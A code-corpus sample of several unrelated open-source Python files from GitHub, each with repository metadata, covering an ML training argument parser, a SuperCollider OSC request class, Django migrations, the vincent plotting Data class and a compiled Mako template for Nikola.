# args.aug_params.append([('randaug', {'size': 32, 'mode': 'SHAKE'})])
elif a == 'svhnspec':
aug_params.append([
('intensity_flip', {}),
('intensity_scaling', {'min': -1.5, 'max': 1.5}),
('intensity_offset', {'min': -0.5, 'max': 0.5}),
('affine', {'std': 0.1}),
('translation', {'x_max': 2.0, 'y_max': 2.0}),
('gaussian', {'std': 0.1}),
])
elif a == 'translation':
aug_params.append([
('translation', {'x_max': 2.0, 'y_max': 2.0}),
])
elif a == 'randaug':
aug_params.append([('randaug', {'size': args.data.img_size[0]})])
else:
##TODO: simplify
aug_params.append(None)
return aug_params
def parse_args():
## inint a parser
parser = argparse.ArgumentParser(description='digit dataset training')
## meta args
parser.add_argument('--snapshot_prefix', type=str, required=True)
parser.add_argument('--no_mid_results', action='store_true')
#parser.add_argument('--exp_name', required=True, type=str, help='experiment name')
#parser.add_argument('--snapshot_root', default='snapshots', type=str, help='snapshot root name')
parser.add_argument('--cpu', action='store_true', help='use CPU')
parser.add_argument('--ideal', action='store_true', help='enable cheatkey')
parser.add_argument('--merge_train_val', action='store_true', help='merge train and validataion set')
parser.add_argument('--training_type', type=str, default='selfcon', help='snapshot root name') ## selfcon, self, advtr, srconly
## dataset args
parser.add_argument('--data.batch_size', default=100, type=int, help='batch size')
parser.add_argument('--data.n_labels', default=10, type=int, help='the number of labels')
parser.add_argument('--data.src', type=str, nargs='*', default=['MNIST'], help='list of sources')
parser.add_argument('--data.tar', type=str, default='USPS', help='target')
parser.add_argument('--data.aug', type=str, nargs='*', default=[''], help='list of data augmentation')
parser.add_argument('--data.aug_init', type=str, nargs='*', default=[''], help='list of data augmentation')
parser.add_argument('--data.img_size', type=int, nargs=3, default=(32, 32, 3), help='image size')
parser.add_argument('--data.sample_ratio', type=float, nargs=2, default=[1.0, 1.0])
## model args
parser.add_argument('--model.base', default='ResNet18', type=str, help='model name')
parser.add_argument('--model.conf', default='ConfPred', type=str, help='model name')
parser.add_argument('--model.iw', default='BigFNN', type=str, help='model name')
# ## self-train args
# parser.add_argument('--train.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train.load_final', action='store_true', help='load the final model')
parser.add_argument('--train.n_epochs', type=int, default=50, help='the number of training iterations')
# parser.add_argument('--train.init_advtr', action='store_true', help='model initialization approach')
# parser.add_argument('--train.val_period', default=1, type=int, help='validation period in epochs')
# ## base model train args
# parser.add_argument('--train_base.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_base.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_base.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_base.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_base.lr_step_size', default=5, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_base.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_base.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_base.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_base.n_epochs', default=25, type=int, help='the number of epochs')
# parser.add_argument('--train_base.val_period', default=1, type=int, help='validation period in epochs')
# ## iw train args
# parser.add_argument('--train_iw.rerun', action='store_true', help='find the best model')
# parser.add_argument('--train_iw.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_iw.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_iw.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_iw.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_iw.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_iw.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_iw.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_iw.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_iw.val_period', default=1, type=int, help='validation period in epochs')
# ## cal args
# parser.add_argument('--cal_iw.rerun', action='store_true', help='find the best model')
# parser.add_argument('--cal_iw.load_final', action='store_true', help='load the final model')
# parser.add_argument('--cal_iw.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--cal_iw.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--cal_iw.lr_step_size', default=50, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--cal_iw.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--cal_iw.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--cal_iw.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--cal_iw.n_epochs', default=500, type=int, help='the number of epochs')
# parser.add_argument('--cal_iw.val_period', default=1, type=int, help='validation period in epochs')
# ## train args
# parser.add_argument('--train_advtr.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_advtr.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_advtr.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_advtr.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_advtr.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_advtr.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_advtr.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_advtr.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_advtr.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_advtr.val_period', default=1, type=int, help='validation period in epochs')
# parser.add_argument('--train_advtr.advtr_type', type=str, default='DANN', help='domain-adversarial training type')
parser.add_argument('--train_advtr.model_advtr', type=str, default='BigAdvFNN', help='adversarial network name')
# parser.add_argument('--train_advtr.reg_param_adv', type=float, default=1.0, help='adversarial loss regularization parameter')
# parser.add_argument('--train_advtr.no_adv_reg_schedule', action='store_true', help='do not schedule the adversarial loss regularization parameter')
# ## base model init train args
# parser.add_argument('--train_base_init.rerun', action='store_true', help='find the best model')
# parser.add_argument('--train_base_init.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_base_init.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_base_init.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_base_init.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_base_init.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_base_init.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_base_init.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_base_init.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_base_init.val_period', default=1, type=int, help='validation period in epochs')
# ## conf args
# #parser.add_argument('--train_conf.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_conf.load_final', action='store_true', help='load the final model')
parser.add_argument('--train_conf.eps', type=float, default=0.01, help='epsilon')
args = parser.parse_args()
args = to_tree_namespace(args)
## duplicate
##TODO: better way?
# args.train.save_root = os.path.join(args.snapshot_root, args.exp_name)
# args.train_base.save_root = args.train.save_root
# args.train_iw.save_root = args.train.save_root
# args.cal_iw.save_root = args.train.save_root
# args.train_advtr.save_root = args.train.save_root
# args.train_base_init.save_root = args.train.save_root
# args.train_conf.save_root = args.train.save_root
args.model.n_labels = args.data.n_labels
args.model.img_size = args.data.img_size
# args.train_advtr.schedule_reg_param_adv = not args.train_advtr.no_adv_reg_schedule
# args.train_advtr.load_final = True
#args.train.load_final = True
#args.train_base.load_final = True
## init aug parameters
args.aug_params = init_aug_params(args.data.aug, args)
args.aug_params_init = init_aug_params(args.data.aug_init, args)
# args.aug_params = []
# for a in args.data.aug:
# if a == 'jitter':
# args.aug_params.append([('jitter', {'brightness': 0.4, 'contrast': 0.4, 'saturation': 0.4})])
# # elif a == 'shake':
# # args.aug_params.append([('randaug', {'size': 32, 'mode': 'SHAKE'})])
# elif a == 'svhnspec':
# args.aug_params.append([
# ('intensity_flip', {}),
# ('intensity_scaling', {'min': -1.5, 'max': 1.5}),
# ('intensity_offset', {'min': -0.5, 'max': 0.5}),
# ('affine', {'std': 0.1}),
# ('translation', {'x_max': 2.0, 'y_max': 2.0}),
# ('gaussian', {'std': 0.1}),
# ])
# elif a == 'translation':
# args.aug_params.append([
# ('translation', {'x_max': 2.0, 'y_max': 2.0}),
# ])
# elif a == 'randaug':
# args.aug_params.append([('randaug', {'size': args.data.img_size[0]})])
# else:
# ##TODO: simplify
# args.aug_params.append(None)
return args
if __name__ == '__main__':
args = parse_args()
main(args)
|
{
"content_hash": "95c21fcc30ee04c74035384790e0a86f",
"timestamp": "",
"source": "github",
"line_count": 474,
"max_line_length": 188,
"avg_line_length": 49.040084388185655,
"alnum_prop": 0.6138524413852441,
"repo_name": "googleinterns/intern2020_cocal",
"id": "db7bd30ccce68349f1627862836f7a983f8b6992",
"size": "23245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "uncertainty/plots/compute_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "293984"
},
{
"name": "Shell",
"bytes": "3237"
}
],
"symlink_target": ""
}
|
import collections
from supriya.tools import osctools
from supriya.tools.requesttools.Request import Request
class NodeAfterRequest(Request):
### CLASS VARIABLES ###
__slots__ = (
'_node_id_pairs',
)
### INITIALIZER ###
def __init__(
self,
node_id_pairs=None,
):
from supriya.tools import requesttools
Request.__init__(self)
if node_id_pairs:
if not isinstance(node_id_pairs, collections.Sequence):
node_id_pairs = [node_id_pairs]
prototype = requesttools.NodeIdPair
assert all(isinstance(x, prototype) for x in node_id_pairs)
node_id_pairs = tuple(node_id_pairs)
self._node_id_pairs = node_id_pairs
### PUBLIC METHODS ###
def to_osc_message(self):
request_id = int(self.request_id)
contents = [request_id]
if self.node_id_pairs:
for node_id_pair in self.node_id_pairs:
contents.append(node_id_pair.node_id)
contents.append(node_id_pair.target_node_id)
message = osctools.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def node_id_pairs(self):
return self._node_id_pairs
@property
def response_specification(self):
return None
@property
def request_id(self):
from supriya.tools import requesttools
return requesttools.RequestId.NODE_AFTER
|
{
"content_hash": "ad289c4bd90dfa0716e1f9c499c6941b",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 71,
"avg_line_length": 26.90909090909091,
"alnum_prop": 0.597972972972973,
"repo_name": "andrewyoung1991/supriya",
"id": "1cede7b1949404ae8587adea6d642c8ab63aa6c6",
"size": "1506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "supriya/tools/requesttools/NodeAfterRequest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6712"
},
{
"name": "CSS",
"bytes": "446"
},
{
"name": "HTML",
"bytes": "1083"
},
{
"name": "JavaScript",
"bytes": "6163"
},
{
"name": "Makefile",
"bytes": "6775"
},
{
"name": "Python",
"bytes": "2693776"
}
],
"symlink_target": ""
}
|
import ui
from view_lock import *
from view_messages import *
from view_settings import *
def make_button_item(action, image_name):
return ui.ButtonItem(action=action, image=ui.Image.named(image_name))
class NavController(ui.View):
def __init__(self):
self.vc = {}
#
self.vc['lock'] = LockController()
self.vc['lock'].set_unlock_callback(self.unlock)
#
self.vc['messages'] = MessagesController()
self.vc['messages'].view.right_button_items = [make_button_item(self.bt_settings, 'ionicons-gear-a-24')]
#
self.vc['settings'] = SettingsController()
#
self.nav_view = ui.NavigationView(self.vc['lock'].view)
self.nav_view.present(hide_title_bar=True)
def unlock(self):
self.nav_view.push_view(self.vc['messages'].view)
def bt_settings(self,sender):
self.nav_view.push_view(self.vc['settings'].view)
NavController()
|
{
"content_hash": "965765493215c81f4a0a511d0d2a28cf",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 106,
"avg_line_length": 26.71875,
"alnum_prop": 0.7005847953216374,
"repo_name": "jadeblaquiere/controller-example",
"id": "ecbbe4f4b98e2fe7b87f621acd7e495ffb062740",
"size": "872",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "view_main.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3330"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0005_sponsors'),
]
operations = [
migrations.AddField(
model_name='sponsors',
name='picture',
field=models.ImageField(default=datetime.datetime(2015, 11, 18, 16, 16, 34, 942326, tzinfo=utc), upload_to=b'sponsors'),
preserve_default=False,
),
]
|
{
"content_hash": "fc3ec66a6f88ff1d86a01b9dc06925ab",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 132,
"avg_line_length": 25.761904761904763,
"alnum_prop": 0.6303142329020333,
"repo_name": "jgsjv/treinamento_django",
"id": "dc6b76b69e10b9309747c90d11fe1de572e0583a",
"size": "565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/blogapp/migrations/0006_sponsors_picture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "13731"
},
{
"name": "Python",
"bytes": "24150"
}
],
"symlink_target": ""
}
|
"""
Data: Vincent Data Class for data importing and Vega Data type
"""
from __future__ import (print_function, division)
import time
import json
from .core import (
_assert_is_type,
ValidationError,
grammar,
GrammarClass,
LoadError
)
from ._compat import str_types
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
class Data(GrammarClass):
"""Data container for visualization
The Vega document may contain the data itself or a reference to a URL
containing the data and formatting instructions. Additionally, new data
can be created from old data via the transform fields.
"""
_default_index_key = 'idx'
def __init__(self, name=None, **kwargs):
"""Initialize a Data object
Parameters
----------
name : string, default None
Name of the data set. If None (default), then the name will be
set to ``'table'``.
**kwargs : dict
Attributes to set on initialization.
"""
super(self.__class__, self).__init__(**kwargs)
self.name = name if name else 'table'
@grammar(str_types)
def name(value):
"""string : Name of the data
This is used by other components (``Mark``, etc.) for reference.
"""
@grammar(str_types)
def url(value):
"""string : URL from which to load the data
This can be used as an alternative to defining the data in the
``values`` attribute.
"""
@grammar(list)
def values(value):
"""list : Data contents
Data is represented in tabular form, where each element of
``values`` corresponds to a row of data. Each row of data is
represented by a dict or a raw number. The keys of the dict are
columns and the values are individual data points. The keys of the
dicts must be strings for the data to correctly serialize to JSON.
The data will often have an "index" column representing the
independent variable, with the remaining columns representing the
dependent variables, though this is not required. The ``Data`` class
itself, however, is agnostic to which columns are dependent and
independent.
For example, the values attribute
``[{'x': 0, 'y': 3.2}, {'x': 1, 'y': 1.3}]``
could represent two rows of two variables - possibly an independent
variable ``'x'`` and a dependent variable ``'y'``.
For simple data sets, an alternative values attribute could be a
simple list of numbers such as
``[2, 12, 3, 5]``.
It may be more convenient to load data from pandas or NumPy objects.
See the methods :func:`Data.from_pandas` and
:func:`Data.from_numpy`.
"""
for row in value:
_assert_is_type('values row', row, (float, int, dict))
@grammar(str_types)
def source(value):
"""string : ``name`` field of another data set
This is typically used with data transforms to create new data
values.
"""
@grammar(list)
def transform(value):
"""list : transforms to apply to the data
Note: Transform-relational classes are not yet implemented.
"""
@grammar(dict)
def format(value):
"""dict : information about the data format
This is only used when loading data from the ``url`` attribute.
Format-relational classes are not yet implemented.
"""
def validate(self, *args):
"""Validate contents of class
"""
super(self.__class__, self).validate(*args)
if not self.name:
raise ValidationError('name is required for Data')
@staticmethod
def serialize(obj):
"""Convert an object into a JSON-serializable value
This is used by the ``from_pandas`` and ``from_numpy`` functions to
convert data to JSON-serializable types when loading.
"""
if isinstance(obj, str_types):
return obj
elif hasattr(obj, 'timetuple'):
return int(time.mktime(obj.timetuple())) * 1000
elif hasattr(obj, 'item'):
return obj.item()
elif hasattr(obj, '__float__'):
if isinstance(obj, int):
return int(obj)
else:
return float(obj)
elif hasattr(obj, '__int__'):
return int(obj)
else:
raise LoadError('cannot serialize index of type '
+ type(obj).__name__)
@classmethod
def from_pandas(cls, data, columns=None, key_on='idx', name=None,
series_key='data', grouped=False, records=False, **kwargs):
"""Load values from a pandas ``Series`` or ``DataFrame`` object
Parameters
----------
data : pandas ``Series`` or ``DataFrame``
Pandas object to import data from.
columns: list, default None
DataFrame columns to convert to Data. Keys default to col names.
If columns are given and on_index is False, x-axis data will
default to the first column.
key_on: string, default 'index'
Value to key on for x-axis data. Defaults to index.
name : string, default None
Applies to the ``name`` attribute of the generated class. If
``None`` (default), then the ``name`` attribute of ``pd_obj`` is
used if it exists, or ``'table'`` if it doesn't.
series_key : string, default 'data'
Applies only to ``Series``. If ``None`` (default), then defaults to
data.name. For example, if ``series_key`` is ``'x'``, then the
entries of the ``values`` list
will be ``{'idx': ..., 'col': 'x', 'val': ...}``.
grouped: boolean, default False
Pass true for an extra grouping parameter
records: boolean, defaule False
Requires Pandas 0.12 or greater. Writes the Pandas DataFrame
using the df.to_json(orient='records') formatting.
**kwargs : dict
Additional arguments passed to the :class:`Data` constructor.
"""
# Note: There's an experimental JSON encoder floating around in
# pandas land that hasn't made it into the main branch. This
# function should be revisited if it ever does.
if not pd:
raise LoadError('pandas could not be imported')
if not hasattr(data, 'index'):
raise ValueError('Please load a Pandas object.')
if name:
vega_data = cls(name=name, **kwargs)
else:
vega_data = cls(name='table', **kwargs)
pd_obj = data.copy()
if columns:
pd_obj = data[columns]
if key_on != 'idx':
pd_obj.index = data[key_on]
if records:
#The worst
vega_data.values = json.loads(pd_obj.to_json(orient='records'))
return vega_data
vega_data.values = []
if isinstance(pd_obj, pd.Series):
data_key = data.name or series_key
for i, v in pd_obj.iterkv():
value = {}
value['idx'] = cls.serialize(i)
value['col'] = data_key
value['val'] = cls.serialize(v)
vega_data.values.append(value)
elif isinstance(pd_obj, pd.DataFrame):
# We have to explicitly convert the column names to strings
# because the json serializer doesn't allow for integer keys.
for i, row in pd_obj.iterrows():
for num, (k, v) in enumerate(row.iterkv()):
value = {}
value['idx'] = cls.serialize(i)
value['col'] = cls.serialize(k)
value['val'] = cls.serialize(v)
if grouped:
value['group'] = num
vega_data.values.append(value)
else:
raise ValueError('cannot load from data type '
+ type(pd_obj).__name__)
return vega_data
@classmethod
def from_numpy(cls, np_obj, name, columns, index=None, index_key=None,
**kwargs):
"""Load values from a numpy array
Parameters
----------
np_obj : numpy.ndarray
numpy array to load data from
name : string
``name`` field for the data
columns : iterable
Sequence of column names, from left to right. Must have same
length as the number of columns of ``np_obj``.
index : iterable, default None
Sequence of indices from top to bottom. If ``None`` (default),
then the indices are integers starting at 0. Must have same
length as the number of rows of ``np_obj``.
index_key : string, default None
Key to use for the index. If ``None`` (default), ``idx`` is
used.
**kwargs : dict
Additional arguments passed to the :class:`Data` constructor
Notes
-----
The individual elements of ``np_obj``, ``columns``, and ``index``
must return valid values from :func:`Data.serialize`.
"""
if not np:
raise LoadError('numpy could not be imported')
_assert_is_type('numpy object', np_obj, np.ndarray)
# Integer index if none is provided
index = index or range(np_obj.shape[0])
# Explicitly map dict-keys to strings for JSON serializer.
columns = list(map(str, columns))
index_key = index_key or cls._default_index_key
if len(index) != np_obj.shape[0]:
raise LoadError(
'length of index must be equal to number of rows of array')
elif len(columns) != np_obj.shape[1]:
raise LoadError(
'length of columns must be equal to number of columns of '
'array')
data = cls(name=name, **kwargs)
data.values = [
dict([(index_key, cls.serialize(idx))] +
[(col, x) for col, x in zip(columns, row)])
for idx, row in zip(index, np_obj.tolist())]
return data
@classmethod
def from_mult_iters(cls, name=None, idx=None, **kwargs):
"""Load values from multiple iters
Parameters
----------
name : string, default None
Name of the data set. If None (default), the name will be set to
``'table'``.
idx: string, default None
Iterable to use for the data index
**kwargs : dict of iterables
The ``values`` field will contain dictionaries with keys for
each of the iterables provided. For example,
d = Data.from_iters(idx='x', x=[0, 1, 5], y=(10, 20, 30))
would result in ``d`` having a ``values`` field with
[{'idx': 0, 'col': 'y', 'val': 10},
{'idx': 1, 'col': 'y', 'val': 20}
If the iterables are not the same length, then ValueError is
raised.
"""
if not name:
name = 'table'
lengths = [len(v) for v in kwargs.values()]
if len(set(lengths)) != 1:
raise ValueError('Iterables must all be same length')
if not idx:
raise ValueError('Must provide iter name index reference')
index = kwargs.pop(idx)
vega_vals = []
for k, v in sorted(kwargs.items()):
for idx, val in zip(index, v):
value = {}
value['idx'] = idx
value['col'] = k
value['val'] = val
vega_vals.append(value)
return cls(name, values=vega_vals)
@classmethod
def from_iter(cls, data, name=None):
"""Convenience method for loading data from an iterable.
Defaults to numerical indexing for x-axis.
Parameters
----------
data: iterable
An iterable of data (list, tuple, dict of key/val pairs)
name: string, default None
Name of the data set. If None (default), the name will be set to
``'table'``.
"""
if not name:
name = 'table'
if isinstance(data, (list, tuple)):
data = {x: y for x, y in enumerate(data)}
values = [{'idx': k, 'col': 'data', 'val': v}
for k, v in sorted(data.items())]
return cls(name, values=values)
@classmethod
def keypairs(cls, data, columns=None, use_index=False, name=None):
"""This will format the data as Key: Value pairs, rather than the
idx/col/val style. This is useful for some transforms, and to
key choropleth map data
Standard Data Types:
List: [0, 10, 20, 30, 40]
Paired Tuples: ((0, 1), (0, 2), (0, 3))
Dict: {'A': 10, 'B': 20, 'C': 30, 'D': 40, 'E': 50}
Plus Pandas DataFrame and Series, and Numpy ndarray
Parameters
----------
data:
List, Tuple, Dict, Pandas Series/DataFrame, Numpy ndarray
columns: list, default None
If passing Pandas DataFrame, you must pass at least one column
name.If one column is passed, x-values will default to the index
values.If two column names are passed, x-values are columns[0],
y-values columns[1].
use_index: boolean, default False
Use the DataFrame index for your x-values
"""
if not name:
name = 'table'
cls.raw_data = data
#Tuples
if isinstance(data, tuple):
values = [{"x": x[0], "y": x[1]} for x in data]
#Lists
elif isinstance(data, list):
values = [{"x": x, "y": y}
for x, y in zip(range(len(data) + 1), data)]
#Dicts
elif isinstance(data, dict) or isinstance(data, pd.Series):
values = [{"x": x, "y": y} for x, y in sorted(data.items())]
#Dataframes
elif isinstance(data, pd.DataFrame):
if len(columns) > 1 and use_index:
raise ValueError('If using index as x-axis, len(columns)'
'cannot be > 1')
if use_index or len(columns) == 1:
values = [{"x": cls.serialize(x[0]),
"y": cls.serialize(x[1][columns[0]])}
for x in data.iterrows()]
else:
values = [{"x": cls.serialize(x[1][columns[0]]),
"y": cls.serialize(x[1][columns[1]])}
for x in data.iterrows()]
#NumPy arrays
elif isinstance(data, np.ndarray):
values = cls._numpy_to_values(data)
else:
raise TypeError('unknown data type %s' % type(data))
return cls(name, values=values)
@staticmethod
def _numpy_to_values(data):
'''Convert a NumPy array to values attribute'''
def to_list_no_index(xvals, yvals):
return [{"x": x, "y": np.asscalar(y)}
for x, y in zip(xvals, yvals)]
if len(data.shape) == 1 or data.shape[1] == 1:
xvals = range(data.shape[0] + 1)
values = to_list_no_index(xvals, data)
elif len(data.shape) == 2:
if data.shape[1] == 2:
# NumPy arrays and matrices have different iteration rules.
if isinstance(data, np.matrix):
xidx = (0, 0)
yidx = (0, 1)
else:
xidx = 0
yidx = 1
xvals = [np.asscalar(row[xidx]) for row in data]
yvals = [np.asscalar(row[yidx]) for row in data]
values = [{"x": x, "y": y} for x, y in zip(xvals, yvals)]
else:
raise ValueError('arrays with > 2 columns not supported')
else:
raise ValueError('invalid dimensions for ndarray')
return values
def to_json(self, validate=False, pretty_print=True, data_path=None):
"""Convert data to JSON
Parameters
----------
data_path : string
If not None, then data is written to a separate file at the
specified path. Note that the ``url`` attribute if the data must
be set independently for the data to load correctly.
Returns
-------
string
Valid Vega JSON.
"""
#TODO: support writing to separate file
return super(self.__class__, self).to_json(validate=validate,
pretty_print=pretty_print)
|
{
"content_hash": "9e7bba493ac3b58d53ef23c42611c4b2",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 79,
"avg_line_length": 35.33472803347281,
"alnum_prop": 0.5413854351687389,
"repo_name": "myusuf3/vincent",
"id": "cd8593950890f9688756611dd2fda3ddffaa3d31",
"size": "16914",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "vincent/data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12395"
},
{
"name": "JavaScript",
"bytes": "49697"
},
{
"name": "Python",
"bytes": "188816"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
setup(name='hyde',
version='0.4',
description='static site generator',
packages=find_packages(),
install_requires=(
'django',
'pyYAML',
'markdown2',
'pygments',
'pyrss2gen',
),
)
|
{
"content_hash": "c7d24bf3b2d99ca200412b6703eb0492",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 43,
"avg_line_length": 21.714285714285715,
"alnum_prop": 0.5328947368421053,
"repo_name": "sjl/hyde",
"id": "1e94f2249fac5ca13d4d481efc0127946c9c22f6",
"size": "304",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Emacs Lisp",
"bytes": "349"
},
{
"name": "JavaScript",
"bytes": "92190"
},
{
"name": "Python",
"bytes": "295259"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('dictionary', '0015_auto_20171120_1211'),
]
operations = [
migrations.CreateModel(
name='AnnotationIdglossTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(help_text='\n This is the name of a sign used by annotators when glossing the corpus in\n an ELAN annotation file.', max_length=30, verbose_name='Annotation ID Gloss')),
],
),
migrations.AddField(
model_name='annotationidglosstranslation',
name='gloss',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dictionary.Gloss'),
),
migrations.AddField(
model_name='annotationidglosstranslation',
name='language',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dictionary.Language'),
),
migrations.AlterUniqueTogether(
name='annotationidglosstranslation',
unique_together=set([('gloss', 'language')]),
),
]
|
{
"content_hash": "59fa047ef8fa25d63e9f2c836eb867d6",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 225,
"avg_line_length": 38.457142857142856,
"alnum_prop": 0.6181277860326895,
"repo_name": "Signbank/NGT-signbank",
"id": "1cb3bfae94e2b1fee8c1dccc3a8762c7b832bac8",
"size": "1417",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "signbank/dictionary/migrations/0016_auto_20171123_1654.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "441343"
},
{
"name": "HTML",
"bytes": "401393"
},
{
"name": "JavaScript",
"bytes": "737137"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Python",
"bytes": "818708"
}
],
"symlink_target": ""
}
|
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 9
_modified_time = 1382819994.53595
_enable_loop = True
_template_filename = u'/home/ali/BLOG/VENV/local/lib/python2.7/site-packages/nikola/data/themes/base/templates/base_helper.tmpl'
_template_uri = u'base_helper.tmpl'
_source_encoding = 'utf-8'
_exports = ['html_head', 'html_translations', 'html_navigation_links', 'html_social', 'late_load_js', 'html_sidebar_links']
def render_body(context,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
# SOURCE LINE 46
__M_writer(u'\n\n')
# SOURCE LINE 49
__M_writer(u'\n\n')
# SOURCE LINE 53
__M_writer(u'\n\n<!--FIXME: remove in v7 -->\n')
# SOURCE LINE 58
__M_writer(u'\n\n')
# SOURCE LINE 81
__M_writer(u'\n\n\n')
# SOURCE LINE 90
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_html_head(context):
__M_caller = context.caller_stack._push_frame()
try:
favicons = context.get('favicons', UNDEFINED)
description = context.get('description', UNDEFINED)
title = context.get('title', UNDEFINED)
use_cdn = context.get('use_cdn', UNDEFINED)
translations = context.get('translations', UNDEFINED)
blog_author = context.get('blog_author', UNDEFINED)
_link = context.get('_link', UNDEFINED)
rss_link = context.get('rss_link', UNDEFINED)
striphtml = context.get('striphtml', UNDEFINED)
comment_system_id = context.get('comment_system_id', UNDEFINED)
has_custom_css = context.get('has_custom_css', UNDEFINED)
mathjax_config = context.get('mathjax_config', UNDEFINED)
len = context.get('len', UNDEFINED)
comment_system = context.get('comment_system', UNDEFINED)
use_bundles = context.get('use_bundles', UNDEFINED)
blog_title = context.get('blog_title', UNDEFINED)
__M_writer = context.writer()
# SOURCE LINE 2
__M_writer(u'\n <meta charset="utf-8">\n')
# SOURCE LINE 4
if description:
# SOURCE LINE 5
__M_writer(u' <meta name="description" content="')
__M_writer(unicode(description))
__M_writer(u'">\n')
# SOURCE LINE 7
__M_writer(u' <meta name="author" content="')
__M_writer(unicode(blog_author))
__M_writer(u'">\n <title>')
# SOURCE LINE 8
__M_writer(striphtml(unicode(title)))
__M_writer(u' | ')
__M_writer(striphtml(unicode(blog_title)))
__M_writer(u'</title>\n ')
# SOURCE LINE 9
__M_writer(unicode(mathjax_config))
__M_writer(u'\n')
# SOURCE LINE 10
if use_bundles:
# SOURCE LINE 11
if use_cdn:
# SOURCE LINE 12
__M_writer(u' <link href="/assets/css/all.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 13
else:
# SOURCE LINE 14
__M_writer(u' <link href="/assets/css/all-nocdn.css" rel="stylesheet" type="text/css">\n')
# SOURCE LINE 16
else:
# SOURCE LINE 17
